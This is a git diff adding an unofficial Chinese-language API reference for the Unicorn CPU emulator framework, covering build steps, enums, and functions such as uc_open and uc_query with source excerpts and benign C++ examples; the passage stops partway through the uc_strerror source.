a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/kbrF7NdV6LDxnYI.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/kbrF7NdV6LDxnYI.png new file mode 100644 index 0000000..c7e5bd4 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/kbrF7NdV6LDxnYI.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l1AhdxgKE2U3tZB.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l1AhdxgKE2U3tZB.png new file mode 100644 index 0000000..24e592a Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l1AhdxgKE2U3tZB.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l4HhgDzcJIVvFNU.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l4HhgDzcJIVvFNU.png new file mode 100644 index 0000000..475ac91 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/l4HhgDzcJIVvFNU.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/q3JtOQRPl5xTFKp.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/q3JtOQRPl5xTFKp.png new file mode 100644 index 0000000..258d275 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/q3JtOQRPl5xTFKp.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/Micro Unicorn-Engine API Documentation.md b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/Micro Unicorn-Engine API Documentation.md new file mode 100644 index 0000000..fab030a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/Micro Unicorn-Engine API Documentation.md @@ -0,0 +1,2754 @@ +# Micro Unicorn-Engine API Documentation + +**Warning:** ***This is an unofficial API document by [kabeor](https://github.com/kabeor), If there are any mistakes, welcome to ask.*** + +**注意:** ***这是由kabeor制作的非官方API参考文档,如有错误欢迎提出,觉得不错可以给个star鼓励我*** + +之前对Capstone反汇编引擎的API分析文档已经被[官方](http://www.capstone-engine.org/documentation.html)收录 https://github.com/kabeor/Micro-Capstone-Engine-API-Documentation ,在实现自己想要做出的调试器的路上,又遇到了与Capstone同作者的国外大佬aquynh的另一个著名项目Unicorn,不巧的是,详尽的API文档仍然较少,更多的是大篇幅的代码,因此决定继续分析Unicorn框架,包括数据类型,已开放API及其实现。 + +Unicorn是一个轻量级, 多平台, 多架构的CPU模拟器框架,基于qemu开发,它可以代替CPU模拟代码的执行,常用于恶意代码分析,Fuzz等,该项目被用于Radare2逆向分析框架,GEF(gdb的pwn分析插件),Pwndbg,Angr符号执行框架等多个著名项目。接下来我也将通过阅读源码和代码实际调用来写一个简单的非官方版本的API手册。 + +Blog: kabeor.cn + +## 0x0 开发准备 + +Unicorn官网: http://www.unicorn-engine.org + +### 自行编译lib和dll方法 + +源码: https://github.com/unicorn-engine/unicorn/archive/master.zip + +下载后解压 + +文件结构如下: + +``` +. <- 主要引擎core engine + README + 编译文档COMPILE.TXT 等 +├── arch <- 各语言反编译支持的代码实现 +├── bindings <- 中间件 +│ ├── dotnet <- .Net 中间件 + 测试代码 +│ ├── go <- go 中间件 + 测试代码 +│ ├── haskell <- Haskell 中间件 + 测试代码 +│ ├── java <- Java 中间件 + 测试代码 +│ ├── pascal <- Pascal 中间件 + 测试代码 +│ ├── python <- Python 中间件 + 测试代码 +│ ├── ruby <- Ruby 中间件 + 测试代码 +│ └── vb6 <- VB6 中间件 + 测试代码 +├── docs <- 文档,主要是Unicorn的实现思路 +├── include <- C头文件 +├── msvc <- Microsoft Visual Studio 支持(Windows) +├── qemu <- qemu框架源码 +├── samples <- Unicorn使用示例 +└── tests <- C语言测试用例 +``` + +下面演示Windows10使用Visual Studio2019编译 + +打开msvc文件夹,内部结构如下 + +![image.png](API_Doc_Pic/iyodlNFY7hHEOgS.png) + +VS打开unicorn.sln项目文件,解决方案自动载入这些 + +![image.png](API_Doc_Pic/fOnNpSKvjYyc7QB.png) + +如果都需要的话,直接编译就好了,只需要其中几种,则右键解决方案->属性->配置属性 如下 + +![image.png](API_Doc_Pic/F3rSByYuNTGDtC1.png) + +生成选项中勾选你需要的支持项即可 + +项目编译属性为: +1. 使用多字节字符集 +2. 不使用预编译头 +3. 附加选项 /wd4018 /wd4244 /wd4267 +4. 预处理器定义中添加 ` _CRT_SECURE_NO_WARNINGS` + +编译后会在当前文件夹Debug目录下生成unicorn.lib静态编译库和unicorn.dll动态库这样就可以开始使用Unicorn进行开发了 + +编译到最后一项可能会报错系统找不到指定的路径,查看makefile发现问题出现在此处 +![image.png](API_Doc_Pic/YCMNcEVyX8GHoPb.png) + +事实上只不过是不能将生成的lib和dll复制到新建的文件夹而已,只需要到生成目录去找即可。 + +官方目前提供的最新已编译版本为1.0.1版本,比较老,建议自己编辑最新版本源码,以获得更多可用API。 +Win32:https://github.com/unicorn-engine/unicorn/releases/download/1.0.1/unicorn-1.0.1-win32.zip +Win64:https://github.com/unicorn-engine/unicorn/releases/download/1.0.1/unicorn-1.0.1-win64.zip + +**注意: 选x32或x64将影响后面开发的位数** + + + +### 引擎调用测试 + +新建一个VS项目,将..\unicorn-master\include\unicorn中的头文件以及编译好的lib和dll文件全部拷贝到新建项目的主目录下 + +![image.png](API_Doc_Pic/I25E9sWcJpGyax7.png) + +在VS解决方案中,头文件添加现有项unicorn.h,资源文件中添加unicorn.lib,重新生成解决方案 + +![image.png](API_Doc_Pic/OVaHwelNQ4tcLmo.png) + +接下来测试我们生成的unicorn框架 + +主文件代码如下 + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" + +// 要模拟的指令 +#define X86_CODE32 "\x41\x4a" // INC ecx; DEC edx + +// 起始地址 +#define ADDRESS 0x1000000 + +int main() +{ + uc_engine* uc; + uc_err err; + int r_ecx = 0x1234; // ECX 寄存器 + int r_edx = 0x7890; // EDX 寄存器 + + printf("Emulate i386 code\n"); + + // X86-32bit 模式初始化模拟 + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + + // 给模拟器申请 2MB 内存 + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // 将要模拟的指令写入内存 + if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { + printf("Failed to write emulation code to memory, quit!\n"); + return -1; + } + + // 初始化寄存器 + uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); + + printf(">>> ECX = 0x%x\n", r_ecx); + printf(">>> EDX = 0x%x\n", r_edx); + + // 模拟代码 + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + // 打印寄存器值 + printf("Emulation done. Below is the CPU context\n"); + + uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); + printf(">>> ECX = 0x%x\n", r_ecx); + printf(">>> EDX = 0x%x\n", r_edx); + + uc_close(uc); + + return 0; +} +``` + +运行结果如下 + +![image.png](API_Doc_Pic/bpu4r8hgzUvO7Pm.png) + +ecx+1和edx-1成功模拟。 + +## 0x1 数据类型分析 + +### uc_arch + +架构选择 + +```cpp +typedef enum uc_arch { + UC_ARCH_ARM = 1, // ARM 架构 (包括 Thumb, Thumb-2) + UC_ARCH_ARM64, // ARM-64, 也称 AArch64 + UC_ARCH_MIPS, // Mips 架构 + UC_ARCH_X86, // X86 架构 (包括 x86 & x86-64) + UC_ARCH_PPC, // PowerPC 架构 (暂不支持) + UC_ARCH_SPARC, // Sparc 架构 + UC_ARCH_M68K, // M68K 架构 + UC_ARCH_MAX, +} uc_arch; +``` + + + +### uc_mode + +模式选择 + +```cpp +typedef enum uc_mode { + UC_MODE_LITTLE_ENDIAN = 0, // 小端序模式 (默认) + UC_MODE_BIG_ENDIAN = 1 << 30, // 大端序模式 + + // arm / arm64 + UC_MODE_ARM = 0, // ARM 模式 + UC_MODE_THUMB = 1 << 4, // THUMB 模式 (包括 Thumb-2) + UC_MODE_MCLASS = 1 << 5, // ARM's Cortex-M 系列 (暂不支持) + UC_MODE_V8 = 1 << 6, // ARMv8 A32 encodings for ARM (暂不支持) + + // arm (32bit) cpu 类型 + UC_MODE_ARM926 = 1 << 7, // ARM926 CPU 类型 + UC_MODE_ARM946 = 1 << 8, // ARM946 CPU 类型 + UC_MODE_ARM1176 = 1 << 9, // ARM1176 CPU 类型 + + // mips + UC_MODE_MICRO = 1 << 4, // MicroMips 模式 (暂不支持) + UC_MODE_MIPS3 = 1 << 5, // Mips III ISA (暂不支持) + UC_MODE_MIPS32R6 = 1 << 6, // Mips32r6 ISA (暂不支持) + UC_MODE_MIPS32 = 1 << 2, // Mips32 ISA + UC_MODE_MIPS64 = 1 << 3, // Mips64 ISA + + // x86 / x64 + UC_MODE_16 = 1 << 1, // 16-bit 模式 + UC_MODE_32 = 1 << 2, // 32-bit 模式 + UC_MODE_64 = 1 << 3, // 64-bit 模式 + + // ppc + UC_MODE_PPC32 = 1 << 2, // 32-bit 模式 (暂不支持) + UC_MODE_PPC64 = 1 << 3, // 64-bit 模式 (暂不支持) + UC_MODE_QPX = 1 << 4, // Quad Processing eXtensions 模式 (暂不支持) + + // sparc + UC_MODE_SPARC32 = 1 << 2, // 32-bit 模式 + UC_MODE_SPARC64 = 1 << 3, // 64-bit 模式 + UC_MODE_V9 = 1 << 4, // SparcV9 模式 (暂不支持) + + // m68k +} uc_mode; +``` + + + +### uc_err + +错误类型,是uc_errno()的返回值 + +```cpp +typedef enum uc_err { + UC_ERR_OK = 0, // 无错误 + UC_ERR_NOMEM, // 内存不足: uc_open(), uc_emulate() + UC_ERR_ARCH, // 不支持的架构: uc_open() + UC_ERR_HANDLE, // 不可用句柄 + UC_ERR_MODE, // 不可用/不支持架构: uc_open() + UC_ERR_VERSION, // 不支持版本 (中间件) + UC_ERR_READ_UNMAPPED, // 由于在未映射的内存上读取而退出模拟: uc_emu_start() + UC_ERR_WRITE_UNMAPPED, // 由于在未映射的内存上写入而退出模拟: uc_emu_start() + UC_ERR_FETCH_UNMAPPED, // 由于在未映射的内存中获取数据而退出模拟: uc_emu_start() + UC_ERR_HOOK, // 无效的hook类型: uc_hook_add() + UC_ERR_INSN_INVALID, // 由于指令无效而退出模拟: uc_emu_start() + UC_ERR_MAP, // 无效的内存映射: uc_mem_map() + UC_ERR_WRITE_PROT, // 由于UC_MEM_WRITE_PROT冲突而停止模拟: uc_emu_start() + UC_ERR_READ_PROT, // 由于UC_MEM_READ_PROT冲突而停止模拟: uc_emu_start() + UC_ERR_FETCH_PROT, // 由于UC_MEM_FETCH_PROT冲突而停止模拟: uc_emu_start() + UC_ERR_ARG, // 提供给uc_xxx函数的无效参数 + UC_ERR_READ_UNALIGNED, // 未对齐读取 + UC_ERR_WRITE_UNALIGNED, // 未对齐写入 + UC_ERR_FETCH_UNALIGNED, // 未对齐的提取 + UC_ERR_HOOK_EXIST, // 此事件的钩子已经存在 + UC_ERR_RESOURCE, // 资源不足: uc_emu_start() + UC_ERR_EXCEPTION, // 未处理的CPU异常 + UC_ERR_TIMEOUT // 模拟超时 +} uc_err; +``` + + + +### uc_mem_type + +UC_HOOK_MEM_*的所有内存访问类型 + +```cpp +typedef enum uc_mem_type { + UC_MEM_READ = 16, // 内存从..读取 + UC_MEM_WRITE, // 内存写入到.. + UC_MEM_FETCH, // 内存被获取 + UC_MEM_READ_UNMAPPED, // 未映射内存从..读取 + UC_MEM_WRITE_UNMAPPED, // 未映射内存写入到.. + UC_MEM_FETCH_UNMAPPED, // 未映射内存被获取 + UC_MEM_WRITE_PROT, // 内存写保护,但是已映射 + UC_MEM_READ_PROT, // 内存读保护,但是已映射 + UC_MEM_FETCH_PROT, // 内存不可执行,但是已映射 + UC_MEM_READ_AFTER, // 内存从 (成功访问的地址) 读入 +} uc_mem_type; +``` + + + +### uc_hook_type + +uc_hook_add()的所有hook类型参数 + +```cpp +typedef enum uc_hook_type { + // Hook 所有中断/syscall 事件 + UC_HOOK_INTR = 1 << 0, + // Hook 一条特定的指令 - 只支持非常小的指令子集 + UC_HOOK_INSN = 1 << 1, + // Hook 一段代码 + UC_HOOK_CODE = 1 << 2, + // Hook 基本块 + UC_HOOK_BLOCK = 1 << 3, + // 用于在未映射的内存上读取内存的Hook + UC_HOOK_MEM_READ_UNMAPPED = 1 << 4, + // Hook 无效的内存写事件 + UC_HOOK_MEM_WRITE_UNMAPPED = 1 << 5, + // Hook 执行事件的无效内存 + UC_HOOK_MEM_FETCH_UNMAPPED = 1 << 6, + // Hook 读保护的内存 + UC_HOOK_MEM_READ_PROT = 1 << 7, + // Hook 写保护的内存 + UC_HOOK_MEM_WRITE_PROT = 1 << 8, + // Hook 不可执行内存上的内存 + UC_HOOK_MEM_FETCH_PROT = 1 << 9, + // Hook 内存读取事件 + UC_HOOK_MEM_READ = 1 << 10, + // Hook 内存写入事件 + UC_HOOK_MEM_WRITE = 1 << 11, + // Hook 内存获取执行事件 + UC_HOOK_MEM_FETCH = 1 << 12, + // Hook 内存读取事件,只允许能成功访问的地址 + // 成功读取后将触发回调 + UC_HOOK_MEM_READ_AFTER = 1 << 13, + // Hook 无效指令异常 + UC_HOOK_INSN_INVALID = 1 << 14, +} uc_hook_type; +``` + + + +### 宏定义Hook类型 + +```cpp +// Hook 所有未映射内存访问的事件 +#define UC_HOOK_MEM_UNMAPPED (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook 所有对受保护内存的非法访问事件 +#define UC_HOOK_MEM_PROT (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) +// Hook 所有非法读取存储器的事件 +#define UC_HOOK_MEM_READ_INVALID (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) +// Hook 所有非法写入存储器的事件 +#define UC_HOOK_MEM_WRITE_INVALID (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) +// Hook 所有非法获取内存的事件 +#define UC_HOOK_MEM_FETCH_INVALID (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) +// Hook 所有非法的内存访问事件 +#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) +// Hook 所有有效内存访问的事件 +// 注意: UC_HOOK_MEM_READ 在 UC_HOOK_MEM_READ_PROT 和 UC_HOOK_MEM_READ_UNMAPPED 之前触发 , +// 因此这个Hook可能会触发一些无效的读取。 +#define UC_HOOK_MEM_VALID (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) +``` + + + +### uc_mem_region + +由uc_mem_map()和uc_mem_map_ptr()映射内存区域 +使用uc_mem_regions()检索该内存区域的列表 + +```cpp +typedef struct uc_mem_region { + uint64_t begin; // 区域起始地址 (包括) + uint64_t end; // 区域结束地址 (包括) + uint32_t perms; // 区域的内存权限 +} uc_mem_region; +``` + + + +### uc_query_type + +uc_query()的所有查询类型参数 + +```cpp +typedef enum uc_query_type { + // 动态查询当前硬件模式 + UC_QUERY_MODE = 1, + UC_QUERY_PAGE_SIZE, + UC_QUERY_ARCH, +} uc_query_type; +``` + + + +### uc_context + +与uc_context_*()一起使用,管理CPU上下文的不透明存储 + +```cpp +struct uc_context; +typedef struct uc_context uc_context; +``` + + + +### uc_prot + +新映射区域的权限 + +```cpp +typedef enum uc_prot { + UC_PROT_NONE = 0, //无 + UC_PROT_READ = 1, //读取 + UC_PROT_WRITE = 2, //写入 + UC_PROT_EXEC = 4, //可执行 + UC_PROT_ALL = 7, //所有权限 +} uc_prot; +``` + + + +## 0x2 API分析 + +### uc_version + +```cpp +unsigned int uc_version(unsigned int *major, unsigned int *minor); +``` + +用于返回Unicorn API主次版本信息 + +``` +@major: API主版本号 +@minor: API次版本号 +@return 16进制数,计算方式 (major << 8 | minor) + +提示: 该返回值可以和宏UC_MAKE_VERSION比较 +``` + +源码实现 + +```c +unsigned int uc_version(unsigned int *major, unsigned int *minor) +{ + if (major != NULL && minor != NULL) { + *major = UC_API_MAJOR; //宏 + *minor = UC_API_MINOR; //宏 + } + + return (UC_API_MAJOR << 8) + UC_API_MINOR; //(major << 8 | minor) +} +``` + +编译后不可更改,不接受自定义版本 + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + unsigned int version; + version = uc_version(NULL,NULL); + cout << hex << version << endl; + return 0; +} +``` + +输出: + +![image.png](API_Doc_Pic/q3JtOQRPl5xTFKp.png) + +得到版本号1.0.0 + + + +### uc_arch_supported + +```c +bool uc_arch_supported(uc_arch arch); +``` + +确定Unicorn是否支持当前架构 + +``` + @arch: 架构类型 (UC_ARCH_*) + @return 如果支持返回True +``` + +源码实现 + +```c +bool uc_arch_supported(uc_arch arch) +{ + switch (arch) { +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: return true; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: return true; +#endif +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: return true; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: return true; +#endif +#ifdef UNICORN_HAS_PPC + case UC_ARCH_PPC: return true; +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: return true; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: return true; +#endif + /* 无效或禁用架构 */ + default: return false; + } +} +``` + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + cout << "是否支持UC_ARCH_X86架构:" << uc_arch_supported(UC_ARCH_X86) << endl; + return 0; +} +``` + +输出: + +![image.png](API_Doc_Pic/NExsavSgu4yMbBQ.png) + + + +### uc_open + +```c +uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc); +``` + +创建新的Unicorn实例 + +``` +@arch: 架构类型 (UC_ARCH_*) +@mode: 硬件模式. 由 UC_MODE_* 组合 +@uc: 指向 uc_engine 的指针, 返回时更新 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **result) +{ + struct uc_struct *uc; + + if (arch < UC_ARCH_MAX) { + uc = calloc(1, sizeof(*uc)); //申请内存 + if (!uc) { + // 内存不足 + return UC_ERR_NOMEM; + } + + uc->errnum = UC_ERR_OK; + uc->arch = arch; + uc->mode = mode; + + // 初始化 + // uc->ram_list = { .blocks = QTAILQ_HEAD_INITIALIZER(ram_list.blocks) }; + uc->ram_list.blocks.tqh_first = NULL; + uc->ram_list.blocks.tqh_last = &(uc->ram_list.blocks.tqh_first); + + uc->memory_listeners.tqh_first = NULL; + uc->memory_listeners.tqh_last = &uc->memory_listeners.tqh_first; + + uc->address_spaces.tqh_first = NULL; + uc->address_spaces.tqh_last = &uc->address_spaces.tqh_first; + + switch(arch) { // 根据架构进行预处理 + default: + break; +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: + if ((mode & ~UC_MODE_M68K_MASK) || + !(mode & UC_MODE_BIG_ENDIAN)) { + free(uc); + return UC_ERR_MODE; + } + uc->init_arch = m68k_uc_init; + break; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: + if ((mode & ~UC_MODE_X86_MASK) || + (mode & UC_MODE_BIG_ENDIAN) || + !(mode & (UC_MODE_16|UC_MODE_32|UC_MODE_64))) { + free(uc); + return UC_ERR_MODE; + } + uc->init_arch = x86_uc_init; + break; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: + if ((mode & ~UC_MODE_ARM_MASK)) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { + uc->init_arch = armeb_uc_init; + } else { + uc->init_arch = arm_uc_init; + } + + if (mode & UC_MODE_THUMB) + uc->thumb = 1; + break; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: + if (mode & ~UC_MODE_ARM_MASK) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { + uc->init_arch = arm64eb_uc_init; + } else { + uc->init_arch = arm64_uc_init; + } + break; +#endif + +#if defined(UNICORN_HAS_MIPS) || defined(UNICORN_HAS_MIPSEL) || defined(UNICORN_HAS_MIPS64) || defined(UNICORN_HAS_MIPS64EL) + case UC_ARCH_MIPS: + if ((mode & ~UC_MODE_MIPS_MASK) || + !(mode & (UC_MODE_MIPS32|UC_MODE_MIPS64))) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { +#ifdef UNICORN_HAS_MIPS + if (mode & UC_MODE_MIPS32) + uc->init_arch = mips_uc_init; +#endif +#ifdef UNICORN_HAS_MIPS64 + if (mode & UC_MODE_MIPS64) + uc->init_arch = mips64_uc_init; +#endif + } else { // 小端序 +#ifdef UNICORN_HAS_MIPSEL + if (mode & UC_MODE_MIPS32) + uc->init_arch = mipsel_uc_init; +#endif +#ifdef UNICORN_HAS_MIPS64EL + if (mode & UC_MODE_MIPS64) + uc->init_arch = mips64el_uc_init; +#endif + } + break; +#endif + +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: + if ((mode & ~UC_MODE_SPARC_MASK) || + !(mode & UC_MODE_BIG_ENDIAN) || + !(mode & (UC_MODE_SPARC32|UC_MODE_SPARC64))) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_SPARC64) + uc->init_arch = sparc64_uc_init; + else + uc->init_arch = sparc_uc_init; + break; +#endif + } + + if (uc->init_arch == NULL) { + return UC_ERR_ARCH; + } + + if (machine_initialize(uc)) + return UC_ERR_RESOURCE; + + *result = uc; + + if (uc->reg_reset) + uc->reg_reset(uc); + + return UC_ERR_OK; + } else { + return UC_ERR_ARCH; + } +} +``` + +**注意: uc_open会申请堆内存,使用完必须用uc_close释放,否则会发生泄露** + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + uc_engine* uc; + uc_err err; + + //// 初始化 X86-32bit 模式模拟器 + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + + if (!err) + cout << "uc引擎创建成功" << endl; + + //// 关闭uc + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + + if (!err) + cout << "uc引擎关闭成功" << endl; + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/dqKBwAWUL7XvypE.png) + + + +### uc_close + +```c +uc_err uc_close(uc_engine *uc); +``` + +关闭一个uc实例,将释放内存。关闭后无法恢复。 + +``` +@uc: 指向由 uc_open() 返回的指针 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_close(uc_engine *uc) +{ + int i; + struct list_item *cur; + struct hook *hook; + + // 清理内部数据 + if (uc->release) + uc->release(uc->tcg_ctx); + g_free(uc->tcg_ctx); + + // 清理 CPU. + g_free(uc->cpu->tcg_as_listener); + g_free(uc->cpu->thread); + + // 清理所有 objects. + OBJECT(uc->machine_state->accelerator)->ref = 1; + OBJECT(uc->machine_state)->ref = 1; + OBJECT(uc->owner)->ref = 1; + OBJECT(uc->root)->ref = 1; + + object_unref(uc, OBJECT(uc->machine_state->accelerator)); + object_unref(uc, OBJECT(uc->machine_state)); + object_unref(uc, OBJECT(uc->cpu)); + object_unref(uc, OBJECT(&uc->io_mem_notdirty)); + object_unref(uc, OBJECT(&uc->io_mem_unassigned)); + object_unref(uc, OBJECT(&uc->io_mem_rom)); + object_unref(uc, OBJECT(uc->root)); + + // 释放内存 + g_free(uc->system_memory); + + // 释放相关线程 + if (uc->qemu_thread_data) + g_free(uc->qemu_thread_data); + + // 释放其他数据 + free(uc->l1_map); + + if (uc->bounce.buffer) { + free(uc->bounce.buffer); + } + + g_hash_table_foreach(uc->type_table, free_table, uc); + g_hash_table_destroy(uc->type_table); + + for (i = 0; i < DIRTY_MEMORY_NUM; i++) { + free(uc->ram_list.dirty_memory[i]); + } + + // 释放hook和hook列表 + for (i = 0; i < UC_HOOK_MAX; i++) { + cur = uc->hook[i].head; + // hook 可存在于多个列表,可通过计数获取释放的时间 + while (cur) { + hook = (struct hook *)cur->data; + if (--hook->refs == 0) { + free(hook); + } + cur = cur->next; + } + list_clear(&uc->hook[i]); + } + + free(uc->mapped_blocks); + + // 最后释放uc自身 + memset(uc, 0, sizeof(*uc)); + free(uc); + + return UC_ERR_OK; +} +``` + +使用实例同uc_open() + + + +### uc_query + +```c +uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result); +``` + +查询引擎的内部状态 + +``` + @uc: uc_open() 返回的句柄 + @type: uc_query_type 中枚举的类型 + + @result: 保存被查询的内部状态的指针 + + @return: 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result) +{ + if (type == UC_QUERY_PAGE_SIZE) { + *result = uc->target_page_size; + return UC_ERR_OK; + } + + if (type == UC_QUERY_ARCH) { + *result = uc->arch; + return UC_ERR_OK; + } + + switch(uc->arch) { +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: + return uc->query(uc, type, result); +#endif + default: + return UC_ERR_ARG; + } + + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; +int main() +{ + uc_engine* uc; + uc_err err; + + //// Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例创建成功" << endl; + + size_t result[] = {0}; + err = uc_query(uc, UC_QUERY_ARCH, result); // 查询架构 + if (!err) + cout << "查询成功: " << *result << endl; + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例关闭成功" << endl; + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/ZtRKvUoaPTlshJ4.png) + +架构查询结果为4,对应的正是UC_ARCH_X86 + + + +### uc_errno + +```c +uc_err uc_errno(uc_engine *uc); +``` + +当某个API函数失败时,报告最后的错误号,一旦被访问,uc_errno可能不会保留原来的值。 + +``` +@uc: uc_open() 返回的句柄 + +@return: 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_errno(uc_engine *uc) +{ + return uc->errnum; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + uc_engine* uc; + uc_err err; + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例创建成功" << endl; + + err = uc_errno(uc); + cout << "错误号: " << err << endl; + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例关闭成功" << endl; + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/IZhyWrGebA5tT4i.png) + +无错误,输出错误号为0 + + + +### uc_strerror + +```c +const char *uc_strerror(uc_err code); +``` + +返回给定错误号的解释 + +``` + @code: 错误号 + + @return: 指向给定错误号的解释的字符串指针 +``` + +源码实现 + +```cpp +const char *uc_strerror(uc_err code) +{ + switch(code) { + default: + return "Unknown error code"; + case UC_ERR_OK: + return "OK (UC_ERR_OK)"; + case UC_ERR_NOMEM: + return "No memory available or memory not present (UC_ERR_NOMEM)"; + case UC_ERR_ARCH: + return "Invalid/unsupported architecture (UC_ERR_ARCH)"; + case UC_ERR_HANDLE: + return "Invalid handle (UC_ERR_HANDLE)"; + case UC_ERR_MODE: + return "Invalid mode (UC_ERR_MODE)"; + case UC_ERR_VERSION: + return "Different API version between core & binding (UC_ERR_VERSION)"; + case UC_ERR_READ_UNMAPPED: + return "Invalid memory read (UC_ERR_READ_UNMAPPED)"; + case UC_ERR_WRITE_UNMAPPED: + return "Invalid memory write (UC_ERR_WRITE_UNMAPPED)"; + case UC_ERR_FETCH_UNMAPPED: + return "Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)"; + case UC_ERR_HOOK: + return "Invalid hook type (UC_ERR_HOOK)"; + case UC_ERR_INSN_INVALID: + return "Invalid instruction 